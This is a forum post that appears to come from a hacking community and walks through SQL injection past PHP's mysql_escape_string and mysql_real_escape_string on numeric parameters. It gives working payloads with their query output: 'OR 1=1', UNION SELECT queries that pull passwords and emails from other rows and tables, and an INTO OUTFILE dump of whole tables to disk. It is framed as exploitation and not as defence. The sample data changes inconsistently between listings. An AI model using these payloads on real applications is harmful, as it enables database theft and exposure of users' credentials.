Hello Guys

I found a new tutorial on the internet to Bypass mysql_escape_string. Here is it.

In general string mysql_escape_string (string $unescaped_string). This function will escape the unescaped_string, so that it is safe to place it in a mysql_query().

First of all mysql_escape_string() does not take a connection argument and does not respect the current charset setting it suffers from the same flaw as addslashes and can be exploited in the same manner.

mysql_escape_string() does not escape % and _
One manifestation of an exploit here could be injection on the LIKE clause of a query

According to manual string mysql_real_escape_string (string $unescaped_string [, resource $link_identifier])
Escapes special characters in the unescaped_string, taking into account the current character set of the connection so that it is safe to place it in a mysql_query() This function must always be used (with few exceptions) to make data safe before sending a query to MySQL.string

In reality, mysql_real_escape_string is there to escape strings and prevent SQL injection on string variables.

Again,

In reality, mysql_real_escape_string is used to escape strings and prevent SQL injection on string variables.

Note the keywords.

Numeric variables are not protected and can be exploited for SQL injection even when passed to mysql_real_escape_string.

i.e.

‘ –> \’

don’t –> don\’t

1 OR 1=1 –> 1 OR 1=1

NOW Actual Exploitation:

Suppose we have this table.

mysql> SELECT * FROM users;
Code:
+----+--------------+-----------+---------------+
| id | username     | password  | email         |
+----+--------------+-----------+---------------+
|  1 | acitryurn     | 3rdehgj  | ab@yahoo.com |
|  2 | zerggfcool     | 0hjwl     | zc@yahoo.com |
|  3 | uytun    | c4hgjghf    | ln@yahoo.com |
|  4 | cghjghjr | fr0rertr | ck@yahoo.com |
+----+--------------+-----------+---------------+
4 rows in set (0.00 sec)

And this table.

mysql> SELECT * FROM notes;
Code:
+----+---------+--------------------------+
| id | user_id | content                  |
+----+---------+--------------------------+
|  1 |       2 | i hate aburn         |
|  2 |       3 | two words: davin hjkirus |
|  3 |       1 | i hate crasjhk ovhjride    |
|  4 |       4 | am i on bsd or lsd?      |
+----+---------+--------------------------+
4 rows in set (0.00 sec)

And this query with protection.
Code:
SELECT    *
FROM    users
WHERE    id = mysql_real_escape_string($user_id);
Exploit and integer variable.

mysql> SELECT * FROM users WHERE id = 1;
Code:
+----+----------+----------+---------------+
| id | username | password | email         |
+----+----------+----------+---------------+
|  1 | aurn | 3rdegre3 | ab@yahoo.com |
+----+----------+----------+---------------+
1 row in set (0.00 sec)

GOOD

Worthless,
Code:
SELECT    *
FROM    users
WHERE    id = mysql_real_escape_string(“1 UNION SELECT id, user_id, content, NULL FROM notes WHERE user_id = 1”);
The query returns

mysql> SELECT * FROM users WHERE id = 1 UNION SELECT id, user_id, content, NULL FROM notes WHERE user_id = 1;
Code:
+----+----------+-----------------------+---------------+
| id | username | password              | email         |
+----+----------+-----------------------+---------------+
|  1 | acidburn | 3rdegre3              | ahb@yahoo.com |
|  3 | 1        | i hate crash override | NULL          |
+----+----------+-----------------------+---------------+
2 rows in set (0.00 sec)

BAD

UNION can help pull more data than what the original query would allow. In the previous example, we retrieved data from a separate table. We can also get more data from the same table.

mysql> SELECT id, username FROM users WHERE id = 1;
Code:
+----+----------+
| id | username |
+----+----------+
|  1 | acidburn |
+----+----------+
1 row in set (0.00 sec)

GOOD

And the exploited query would be.

mysql> SELECT id, username FROM users WHERE id = 1 UNION SELECT password, email FROM users WHERE id = 1;
Code:
+----------+---------------+
| id       | username      |
+----------+---------------+
| 1        | acidburn      |
| 3rdegre3 | ab@yahoo.com |
+----------+---------------+
2 rows in set (0.00 sec)

BAD

File I/O is important functionality for MySQL, especially for data import and export. SQL injection can help abuse this functionality to provide more surface area to attack.

Consider this situation…
Want: Dump of users and notes.
Given: Application with arbitrary file disclosure and SQL injection (no protection).
Caveat: Application code only operates on first row of resultset (will not return full resultset).
Code:
SELECT    *
FROM    users
WHERE    id = 1 OR 1=1 UNION SELECT id, user_id, content, 0 FROM notes INTO OUTFILE '/tmp/users_notes.txt';
WIN it :previewIcon:

$ cat users_notes.txt
Code:
1       acidburn        3rdegre3        ab@yahoo.com
2       zerocool        0kewl   zc@yahoo.com
3       lordnikon       c4mera  ln@yahoo.com
4       cerealkiller    fr00tl00p       ck@yahoo.com
1       2       i hate acid burn        0
2       3       two words: davinci virus        0
3       1       i hate crash override   0
4       4       am i on bsd or lsd?     0
Oh look!!! It’s damn easy!!!!!